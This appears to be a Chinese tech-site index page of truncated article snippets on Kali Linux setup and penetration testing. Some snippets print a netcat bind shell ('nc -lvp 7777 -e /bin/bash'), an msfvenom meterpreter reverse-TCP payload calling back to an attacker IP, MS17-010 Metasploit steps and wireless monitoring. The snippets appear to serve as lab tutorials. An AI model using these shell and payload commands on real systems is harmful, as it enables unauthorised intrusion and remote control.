ICode9

1、下载安装包 wget -c https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz 2、解压到 /usr/local/ 下 tar -C /usr/local/ -xzf go1.8.3.linux-amd64.tar.gz 3、配置环境 root@promote:/#vim /etc/profile 在文件内容后面加上：export PATH=$PATH:/usr/local

假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统，ip为：192.168.0.4，开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令，然后kali

Kali-Linux-2021.1 实现root登录教程 正如Kali官网所说:“ Kali changed to a non-root user policy by default since the release of 2020.1.”，新版本的Kali-Linux-2021.1系统在安装时，创建的是一个非root权限的普通用户。而当我们需要用root登录时，有点不方便，现将教程如下：1、用注

https://www.dazhuanlan.com/niki-y/topics/1113708   有些软件在 Linux 下解压后直接就能使用,尤其是 jetbrains 的产品，每次都要到对应的进程目录下执行启动进程。虽然可以通过创建软链接或者将启动脚本的路径加入环境变量达到在命令行下启动，可比起从桌面直接点击图标启动还是有

简介OWASP ZAP是一款非常好用的测试工具，也是Kali里自带的工具，一键就可以扫描多种不同类型的漏洞，最好用的一点就是他可以自动爬取子域名。非常的快捷方便下面我就给大家带来OWASP ZAP的基本使用方法Let’s go。 设置网络代理使用ZAP之前我们要先设置一下网络代理，我们打开浏览器(本

靶机地址：windows 192.168.1.84 攻击者地址：192.168.20.44 kali   在kali当中生成脚本 msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.20.44 lport=7070 -f exe -o /tmp/win.exe       在kali当中，执行 cd /tmp 进入刚刚生成脚本的目录     执行 python -m Si

安装clash过程从略 github 地址：https://github.com/Dreamacro/clash 安装路径推荐为/opt/clash 为可执行文件添加执行权限 chmod +x clash 为了方便在终端中调用，可以copy一份到/bin cp clash /bin 这样可以不跳转到clash文件夹即可开启clash clash clash 使用 yaml 作为配置文

VMware workstation pro16安装kali教程 下载kali镜像文件，我使用的是2021.2版本的 选择创建新的虚拟机，自定义 接下来的操作大家都知道了，就不啰嗦了 安装完成

目录： 1.Xshell连接kali     先说明一个小白错误：必须要有ssh服务，才能Xhell进行连接。  即  必须要打开kali系统，启动ssh服务，Xshell才可以通过ssh连接上kali。 1.Xshell连接kali 步骤一：进入kali系统，查看ssh服务状态，如果未开启服务，则启动ssh服务。设置开机自启ssh服务。查看kali

前言 本文直接使用kali操作系统进行相关操作，未使用虚拟机，在此不赘述虚拟机配置 如需要即插即用kali操作系统，可戳我。 正文 使用命令iwconfig，确定哪些无线解控是可用的，如图所示，无线网卡名称为wlan0。 使用airmon-ng命令监控无线传输，为监控模式 （monitor mode）设置拥有无线功

  2021 1.安装在虚拟机中 2.安装vmware tools，记得要使用root账户 2.添加、更新Kali仓库（Repository） 3.安装中文输入法     基本信息 kali linux 发行版基于debian系，使用xfce桌面环境、软件包管理程序为apt（超级牛力）、   源 # 源只要添加一个能用的就OK deb http://http.kali.org

目录 NETCAT ——NC功能：网络工具中的瑞士军刀——小身材、大智慧侦听模式 / 传输模式telnet / 获取banner信息传输文本信息传输文件/目录可以远程电子取证 传输文件传输目录 加密传输文件流媒体服务器端口扫描远程克隆硬盘 NETCAT ——NC功能： 网络工具中的瑞士军刀——

本地网络配置 临时配置IP地址（了解即可） 这里每台电脑的ip可能都是不同的，包括DNS服务器，实际不需要再额外做更改 ifconfig eth0 192.168.3.53/24 # 临时配置IP route add default gw 192.168.3.1 # 配置默认路由 echo nameserver 8.8.8.8 > /etc/resolv.conf # 配置DNS服务器 配

li知道密码时，直接修改kali的root密码1.登录kali时使用普通用户2.打开kali的命令终端，直接输入`sudo passwd root`进行修改3.登出当前普通用户，切换`root`用户2.kali忘记密码时，进入单用户模式直接修改kali的root密码1.开机时进入系统选择按`e`2.在编辑页面的倒数第三行把`ro`换成`rw`

1 下载并安装kali 推荐通过iso文件而不是kali官方的VMware压缩包使用kali，这样在安装时可塑性更强，虽然稍微麻烦一点点。 可以通过清华镜像源下载.iso文件 在虚拟机中详细安装过程不做赘述 kali无须分区 推荐在安装时勾选全部的工具包（large） 基本配置 用户密码 设置root用户密码 su

渗透测试流程以及信息收集总纲 一切从信息收集开始 信息收集的作用 获得目标的信息，掌握详细情况，了解目标的弱点和安全短板。收集信息是渗透测试的第一步，信息收集的全面性对于后期的渗透工作必为重要。 例子：cms可能存在通杀漏洞，如果使用了CMS建站我们可以用通杀漏洞直接攻击 例

fdisk 语法 fdisk [必要参数][选择参数] 必要参数： -l 列出素所有分区表 -u 与 -l 搭配使用，显示分区数目 选择参数： -s<分区编号> 指定分区 -v 版本信息 菜单操作说明   m ：显示菜单和帮助信息 a ：活动分区标记/引导分区 d ：删除分区 l ：显示分区类型 n ：新建分区 p ：显示分区信息

首先我们 选择桥接模式（以下内容根据自己的网络环境做更改） ps：桥接模式下。虚拟机相当于另一台物理电脑，相同网络环境下，ip网段要和物理电脑一个网段，但是不能相同 ，我的物理机的ip是192.168.1.34，网关是192.168.1.1 子网掩码是：255.255.255.0 kali系统操作如下： 1、打开网卡配置文件 vim /

    一.什么是apt 高级包装工具（英语：Advanced Packaging Tools,简称：APT）是Debian及其衍生发行版（如：ubuntu）的软件包管理器。APT可以自动下载，配置，安装二进制或者源代码格式的软 件包，因此简化了 Unix系统上管理软件的过程,apt-get命令一般需要root权限执行，所以一般跟着sudo命令。 二

在首次安装kali系统时要给root一个密码，有些命令普通用户是执行不了的，得在root权限下进行操作 1.使用命令 （1）sudo  passwd root      依次输入普通用户密码，给root的新密码，再次输入root新密码即可更新root （2）su root     密码 使用以上命令即可切换到root中      2.编辑ssh

一、常用操作 （一）更换系统源（转载：https://www.cnblogs.com/R-S-PY/p/12949006.html） 1.vim /etc/apt/sources.list或leafpad /etc/apt/sources.list # 官方源 # deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolli

学前准备： 1、使用笔记记录每次学习的重点、难点。 2、先掌握渗透的流程，对技术点的知识进行熟悉，了解什么情况用什么技术。 3、做好后续实战多次失败的准备，做好安装软件、以及软件使用遇到各种问题的准备，不气馁通过度娘打败他们。 环境准备： 1、vm（已有） 2、VMTools（每个系统安装后，都给

这里写目录标题 lscprmmvgroupmodgroupdelgroupuseraddpasswdusermoduserdel ls -a显示所有文件及目录 (. 开头的隐藏文件也会列出)-l除文件名称外，亦将文件型态、权限、拥有者、文件大小等资讯详细列出-r将文件以相反次序显示(原定依英文字母次序)-t将文件依建立时间之先

环境配置 靶机IP”192.168.11.183” 攻击机kali的IP” 192.168.11.181”   具体内容 一.漏扫 1.打开kali找到所用工具，使用命令search ms17-010，找到相应的模块   2.利用模块1 ” use auxiliary/scanner/smb/smb_ms17_010” 进行扫描 3.set目标IP “set rhosts 192.168.11.183”

文章目录 前言配置代理解题信息搜集SMBSQL Server拿shell*持久化shellUser Owns FlagSystem Owns Flag 完 前言 操作基于Kali 2020，参照官方wp 配置代理 Kali连接下发的代理 openvpn xxx.ovpn ifconfig获取当前Kali的ip，10.10.14.*网段的ip 此时靶机可以ping通，靶机ip10.